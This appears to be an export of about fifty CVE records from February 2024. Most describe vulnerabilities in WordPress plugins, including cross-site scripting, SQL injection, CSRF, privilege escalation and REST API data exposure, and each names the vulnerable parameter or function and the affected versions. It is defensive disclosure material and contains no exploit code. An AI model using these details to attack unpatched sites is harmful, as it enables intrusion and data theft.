CVE    2024    1519    Candidate    The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires a member listing page to be active and using the Gerbera theme.    MISC:https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Themes/DragDrop/MemberDirectory/Gerbera.php#L93   |   URL:https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Themes/DragDrop/MemberDirectory/Gerbera.php#L93   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve    Assigned (20240214)
CVE    2024    1516    Candidate    The WP eCommerce plugin for WordPress is vulnerable to unauthorized arbitrary post creation due to a missing capability check on the check_for_saas_push() function in all versions up to, and including, 3.15.1. This makes it possible for unauthenticated attackers to create arbitrary posts with arbitrary content.    MISC:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L191   |   URL:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L191   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve    Assigned (20240214)
CVE    2024    1515    Candidate    ** REJECT ** Erroneous assignment        Assigned (20240214)
CVE    2024    1514    Candidate    The WP eCommerce plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'cart_contents' parameter in all versions up to, and including, 3.15.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L334   |   URL:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L334   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve    Assigned (20240214)
CVE    2024    1512    Candidate    The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset/3036794/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/models/StmStatistics.php   |   URL:https://plugins.trac.wordpress.org/changeset/3036794/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/models/StmStatistics.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve    Assigned (20240214)
CVE    2024    1510    Candidate    The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_tooltip shortcode in all versions up to, and including, 7.0.2 due to insufficient input sanitization and output escaping on user supplied attributes and user supplied tags. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.0.2/includes/shortcodes/tooltip.php   |   URL:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.0.2/includes/shortcodes/tooltip.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3037436/shortcodes-ultimate/trunk/includes/shortcodes/tooltip.php   |   URL:https://plugins.trac.wordpress.org/changeset/3037436/shortcodes-ultimate/trunk/includes/shortcodes/tooltip.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ee03d780-076b-4501-a353-376198a4bd7b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ee03d780-076b-4501-a353-376198a4bd7b?source=cve    Assigned (20240214)
CVE    2024    1508    Candidate    The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'settings['title_tags']' attribute of the Mercury widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite   |   URL:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve    Assigned (20240214)
CVE    2024    1507    Candidate    The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Rubix widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite   |   URL:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve    Assigned (20240214)
CVE    2024    1506    Candidate    The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Fiestar widget in all versions up to, and including, 3.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3044299/bdthemes-prime-slider-lite   |   URL:https://plugins.trac.wordpress.org/changeset/3044299/bdthemes-prime-slider-lite   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve    Assigned (20240214)
CVE    2024    1505    Candidate    The Academy LMS – eLearning and online course solution for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.9.19. This is due to the plugin allowing arbitrary user meta updates through the saved_user_info() function. This makes it possible for authenticated attackers, with minimal permissions such as students, to elevate their user role to that of an administrator.    MISC:https://plugins.trac.wordpress.org/changeset/3037880/academy#file473   |   URL:https://plugins.trac.wordpress.org/changeset/3037880/academy#file473   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b150f90a-ccb7-4c19-a4b3-eaf9ec264ba8?source=cve    Assigned (20240214)
CVE    2024    1503    Candidate    The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the erase_tutor_data() function. This makes it possible for unauthenticated attackers to deactivate the plugin and erase all data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This requires the "Erase upon uninstallation" option to be enabled.    MISC:https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Admin.php#L465   |   URL:https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Admin.php#L465   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve    Assigned (20240214)
CVE    2024    1502    Candidate    The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tutor_delete_announcement() function in all versions up to, and including, 2.6.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve    Assigned (20240214)
CVE    2024    1501    Candidate    The Database Reset plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.22. This is due to missing or incorrect nonce validation on the install_wpr() function. This makes it possible for unauthenticated attackers to install the WP Reset Plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/wordpress-database-reset/trunk/class-db-reset-admin.php#L127   |   URL:https://plugins.trac.wordpress.org/browser/wordpress-database-reset/trunk/class-db-reset-admin.php#L127   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037742%40wordpress-database-reset&new=3037742%40wordpress-database-reset&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e493cf-d022-404d-a501-a6671e6116f4?source=cve    Assigned (20240214)
CVE    2024    1500    Candidate    The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Logo Widget in all versions up to, and including, 1.3.91 due to insufficient input sanitization and output escaping on user supplied URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L644   |   URL:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L644   |   MISC:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L664   |   URL:https://plugins.trac.wordpress.org/browser/royal-elementor-addons/trunk/modules/logo/widgets/wpr-logo.php#L664   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037411%40royal-elementor-addons%2Ftags%2F1.3.91&new=3038353%40royal-elementor-addons%2Ftags%2F1.3.92   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8619c999-5cf7-4888-bdb2-815238411303?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8619c999-5cf7-4888-bdb2-815238411303?source=cve    Assigned (20240214)
CVE    2024    1499    Candidate    The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Pricing Table widget in the $settings['title_tags'] parameter in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1037   |   URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/elementor-extra-widgets/widgets/elementor/pricing-table.php#L1037   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/df40eb21-2080-4de5-9055-09246a8a275e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/df40eb21-2080-4de5-9055-09246a8a275e?source=cve    Assigned (20240214)
CVE    2024    1497    Candidate    The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form widget addr2_width attribute in all versions up to, and including, 2.10.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/themeisle-content-forms/includes/widgets-admin/elementor/elementor_widget_base.php#L1219   |   URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/tags/2.10.30/vendor/codeinwp/themeisle-content-forms/includes/widgets-admin/elementor/elementor_widget_base.php#L1219   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3038451%40themeisle-companion%2Ftrunk&old=3030173%40themeisle-companion%2Ftrunk&sfp_email=&sfph_mail=#file10   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b4603b58-0972-4e04-91ac-ffc846964722?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b4603b58-0972-4e04-91ac-ffc846964722?source=cve    Assigned (20240214)
CVE    2024    1496    Candidate    The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the fifu_input_url parameter in all versions up to, and including, 4.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/featured-image-from-url/tags/4.6.2/elementor/widgets/widget.php#L49   |   URL:https://plugins.trac.wordpress.org/browser/featured-image-from-url/tags/4.6.2/elementor/widgets/widget.php#L49   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve    Assigned (20240214)
CVE    2024    1492    Candidate    The WPify Woo Czech plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the maybe_send_to_packeta function in all versions up to, and including, 4.0.8. This makes it possible for unauthenticated attackers to obtain shipping details for orders as long as the order number is known.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve    Assigned (20240214)
CVE    2024    1489    Candidate    The SMS Alert Order Notifications – WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.9. This is due to missing or incorrect nonce validation on the processBulkAction function. This makes it possible for unauthenticated attackers to delete pages and posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039989%40sms-alert%2Ftrunk&old=3032487%40sms-alert%2Ftrunk&sfp_email=&sfph_mail=#file19   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e7a28382-facb-43a7-892a-8ca9e7f0f62b?source=cve    Assigned (20240214)
CVE    2024    1488    Candidate    A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.    MISC:RHBZ#2264183   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264183   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1488   |   URL:https://access.redhat.com/security/cve/CVE-2024-1488    Assigned (20240214)
CVE    2024    1487    Candidate    The Photos and Files Contest Gallery WordPress plugin before 21.3.1 does not sanitize and escape some parameters, which could allow users with a role as low as author to perform Cross-Site Scripting attacks.    MISC:https://wpscan.com/vulnerability/c028cd73-f30a-4c8b-870f-3071055f0496/   |   URL:https://wpscan.com/vulnerability/c028cd73-f30a-4c8b-870f-3071055f0496/    Assigned (20240214)
CVE    2024    1485    Candidate    A flaw was found in the decompression function of registry-support. This issue can be triggered if an unauthenticated remote attacker tricks a user into parsing a devfile which uses the `parent` or `plugin` keywords. This could download a malicious archive and cause the cleanup process to overwrite or delete files outside of the archive, which should not be allowed.    MISC:RHBZ#2264106   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2264106   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1485   |   URL:https://access.redhat.com/security/cve/CVE-2024-1485   |   MISC:https://github.com/advisories/GHSA-84xv-jfrm-h4gm   |   URL:https://github.com/advisories/GHSA-84xv-jfrm-h4gm   |   MISC:https://github.com/devfile/registry-support/commit/0e44b9ca6d03fac4fc3f77d37656d56dc5defe0d   |   URL:https://github.com/devfile/registry-support/commit/0e44b9ca6d03fac4fc3f77d37656d56dc5defe0d   |   MISC:https://github.com/devfile/registry-support/pull/197   |   URL:https://github.com/devfile/registry-support/pull/197    Assigned (20240213)
CVE    2024    1484    Candidate    The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the date parameters in all versions up to, and including, 1.0.98 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041769%40ameliabooking%2Ftrunk&old=3037721%40ameliabooking%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a849ef2-ad0a-45ea-8827-9a7233b1ca30?source=cve    Assigned (20240213)
CVE    2024    1482    Candidate    An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to create new branches in public repositories and run arbitrary GitHub Actions workflows with permissions from the GITHUB_TOKEN. To exploit this vulnerability, an attacker would need access to the Enterprise Server. This vulnerability affected all versions of GitHub Enterprise Server after 3.8 and prior to 3.12, and was fixed in versions 3.9.10, 3.10.7, 3.11.5. This vulnerability was reported via the GitHub Bug Bounty program.    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240213)
CVE    2024    1479    Candidate    The WP Show Posts plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.4 via the wpsp_display function. This makes it possible for authenticated attackers with contributor access and above to view the contents of draft, trash, future, private and pending posts and pages.    MISC:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L224   |   URL:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L224   |   MISC:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L591   |   URL:https://plugins.trac.wordpress.org/browser/wp-show-posts/trunk/wp-show-posts.php#L591   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041416%40wp-show-posts%2Ftrunk&old=2846296%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041416%40wp-show-posts%2Ftrunk&old=2846296%40wp-show-posts%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6788e2ee-ce61-494b-8d7f-6d1144466e58?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6788e2ee-ce61-494b-8d7f-6d1144466e58?source=cve    Assigned (20240213)
CVE    2024    1478    Candidate    The Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.0 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content via API thus bypassing the content protection provided by the plugin.    MISC:https://wordpress.org/plugins/hkdev-maintenance-mode/   |   URL:https://wordpress.org/plugins/hkdev-maintenance-mode/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/36def628-e09e-4da0-ab14-35aefcb67f73?source=cve    Assigned (20240213)
CVE    2024    1477    Candidate    The Easy Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.2 via the REST API. This makes it possible for authenticated attackers to obtain post and page content via REST API thus bypassing the protection provided by the plugin.    MISC:https://wordpress.org/plugins/easy-maintenance-mode-coming-soon/   |   URL:https://wordpress.org/plugins/easy-maintenance-mode-coming-soon/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1a12f472-0ae1-4c3c-b7e3-85f637fe58c5?source=cve    Assigned (20240213)
CVE    2024    1476    Candidate    The Under Construction / Maintenance Mode from Acurax plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6 via the REST API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages when maintenance mode is active thus bypassing the protection provided by the plugin.    MISC:https://wordpress.org/plugins/coming-soon-maintenance-mode-from-acurax/   |   URL:https://wordpress.org/plugins/coming-soon-maintenance-mode-from-acurax/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f28c47e6-a37d-4328-afb2-6a9e6b3fe20a?source=cve    Assigned (20240213)
CVE    2024    1475    Candidate    The Coming Soon Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.5 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content thus bypassing the protection provided by the plugin.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve    Assigned (20240213)
CVE    2024    1474    Candidate    In WS_FTP Server versions before 8.8.5, reflected cross-site scripting issues have been identified on various user supplied inputs on the WS_FTP Server administrative interface.    MISC:https://community.progress.com/s/article/WS-FTP-Server-Service-Pack-February-2024   |   URL:https://community.progress.com/s/article/WS-FTP-Server-Service-Pack-February-2024   |   MISC:https://www.progress.com/ws_ftp   |   URL:https://www.progress.com/ws_ftp    Assigned (20240213)
CVE    2024    1473    Candidate    The Coming Soon & Maintenance Mode by Colorlib plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.99 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page contents via REST API thus bypassing maintenance mode protection provided by the plugin.    MISC:https://wordpress.org/plugins/colorlib-coming-soon-maintenance/   |   URL:https://wordpress.org/plugins/colorlib-coming-soon-maintenance/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/48dc10a9-7bb9-401f-befd-1bf620858825?source=cve    Assigned (20240213)
CVE    2024    1472    Candidate    The WP Maintenance plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 6.1.6 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's maintenance mode and obtain post and page content via REST API.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3035862%40wp-maintenance%2Ftrunk&old=3032356%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=#file4   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/645328f3-2bcb-4287-952c-2e23ec57bb4e?source=cve    Assigned (20240213)
CVE    2024    1471    Candidate    An HTML injection vulnerability exists where an authenticated, remote attacker with administrator privileges on the Security Center application could modify Repository parameters, which could lead to HTML redirection attacks.    MISC:https://www.tenable.com/security/tns-2024-02   |   URL:https://www.tenable.com/security/tns-2024-02    Assigned (20240213)
CVE    2024    1470    Candidate    Authorization Bypass Through User-Controlled Key vulnerability in NetIQ (OpenText) Client Login Extension on Windows allows Privilege Escalation, Code Injection. This issue only affects NetIQ Client Login Extension: 4.6.    MISC:https://portal.microfocus.com/s/article/KM000026667?language=en_US   |   URL:https://portal.microfocus.com/s/article/KM000026667?language=en_US    Assigned (20240213)
